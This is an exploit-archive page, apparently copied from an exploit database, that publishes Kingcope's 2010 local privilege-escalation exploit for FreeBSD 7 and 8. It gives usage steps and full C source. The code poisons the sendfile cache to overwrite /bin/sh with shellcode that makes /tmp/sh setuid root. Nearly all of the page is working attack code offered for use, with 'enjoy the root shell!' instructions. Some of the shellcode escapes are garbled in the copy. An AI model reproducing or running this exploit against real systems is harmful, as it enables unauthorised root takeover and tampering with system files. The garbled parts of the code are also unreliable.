[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : FreeBSD mbufs() sendfile Cache Poisoning Privilege Escalation
# Published : 2010-08-19
# Author : Kingcope
# Previous Title : A-PDF WAV to MP3 v1.0.0 Universal Local SEH Exploit
# Next Title : MS Excel Malformed FEATHEADER Record Exploit (MS09-067)
/* freebsd x86/x64 sendfile cache local root xpl v2
by Kingcope
2010
--
should h4x any freebsd 8.* and 7.* prior to 12Jul2010
tampers /bin/sh to contain a shellcode which does
'
chmod a+s /tmp/sh
chown root /tmp/sh
execve /tmp/sh2
'
how to use:
terminal 1:
$ cp /bin/sh /tmp/sh
$ cp /bin/sh /tmp/sh2
$ gcc cache.c -o cache
terminal 2:
$ nc -l 7030
terminal 1:
for i386 arch type:
$ ./cache i386
for amd64 arch type:
$ ./cache amd64
now wait
/bin/sh should be execed by the system as root in ~5 mins
then do:
$ /tmp/sh
#
cleanup:
# cp -f /tmp/sh2 /bin/sh
#
enjoy the root shell!
*/
// this juarez is now private on #darknet --
// http://www.youtube.com/watch?v=JtgInqNNpCI
// http://www.youtube.com/watch?v=IdbRWrY4QBI
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/uio.h>
#include <fcntl.h>
#include <netinet/in.h>
#include <sys/select.h>
#include <sys/stat.h>
#include <strings.h>
#include <stdio.h>
#include <string.h>
#include <err.h>
main (int argc, char *argv[]) {
int s, f, k2;
struct sockaddr_in addr;
int flags;
char str32[]=
"x31xc0x6ax00x68x70x2fx73x68x68x2fx2fx74x6dx89xe3"
"x50x50x53xb0x10x50xcdx80x68xedx0dx00x00x53xb0x0f"
"x50xcdx80x31xc0x6ax00x68x2fx73x68x32x68x2fx74x6d"
"x70x89xe3x50x54x53x50xb0x3bxcdx80";
char str64[]=
"x48x31xc0x99xb0x10x48xbfxffx2fx74x6dx70x2fx73x68"
"x48xc1xefx08x57x48x89xe7x48x31xf6x48x31xd2x0fx05"
"xb0x0fx48x31xf6x66xbexedx0dx0fx05x48x31xc0x99xb0"
"x3bx48xbfx2fx74x6dx70x2fx73x68x32x6ax00x57x48x89"
"xe7x57x52x48x89xe6x0fx05";
char buf[10000];
char *p;
struct stat sb;
int n;
fd_set wset;
int64_t size;
off_t sbytes;
off_t sent = 0;
int chunk;
int arch = 3;
if (argc != 2) {
printf("define architecture i386 or amd64n");
return;
}
if (strcmp(argv[1], "i386") == 0)
arch=1;
if (strcmp(argv[1], "amd64") == 0)
arch=2;
if (arch == 3) {
printf("define architecture i386 or amd64n");
return;
}
s = socket(AF_INET, SOCK_STREAM, 0);
bzero(&addr, sizeof(addr));
addr.sin_family = AF_INET;
addr.sin_port = htons(7030);
addr.sin_addr.s_addr = inet_addr("127.0.0.1");
n = connect(s, (struct sockaddr *)&addr, sizeof (addr));
if (n < 0)
warn ("fail to connect");
f = open("/bin/sh", O_RDONLY);
if (f<0)
warn("fail to open file");
n = fstat(f, &sb);
if (n<0)
warn("fstat failed");
size = sb.st_size;
chunk = 0;
flags = fcntl(f, F_GETFL);
flags |= O_NONBLOCK;
fcntl(f, F_SETFL, flags);
while (size > 0) {
FD_ZERO(&wset);
FD_SET(s, &wset);
n = select(f+1, NULL, &wset, NULL, NULL);
if (n < 0)
continue;
if (chunk > 0) {
sbytes = 0;
if (arch == 1)
n = sendfile(f, s, 2048*2, chunk, NULL, &sbytes,0);
if (arch == 2)
n = sendfile(f, s, 1204*6, chunk, NULL, &sbytes,0);
if (n < 0)
continue;
chunk -= sbytes;
size -= sbytes;
sent += sbytes;
continue;
}
chunk = 2048;
memset(buf, '�', sizeof buf);
if (arch == 1) {
for (k2=0;k2<256;k2++) {
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
memcpy(p, str32, sizeof str32);
n = k2 + sizeof str32;
p = buf;
}
if (arch == 2) {
for (k2=0;k2<100;k2++) {
buf[k2] = 0x90;
}
p = buf;
p = p + k2;
memcpy(p, str64, sizeof str64);
n = k2 + sizeof str64;
p = buf;
}
write(s, p, n);
}
}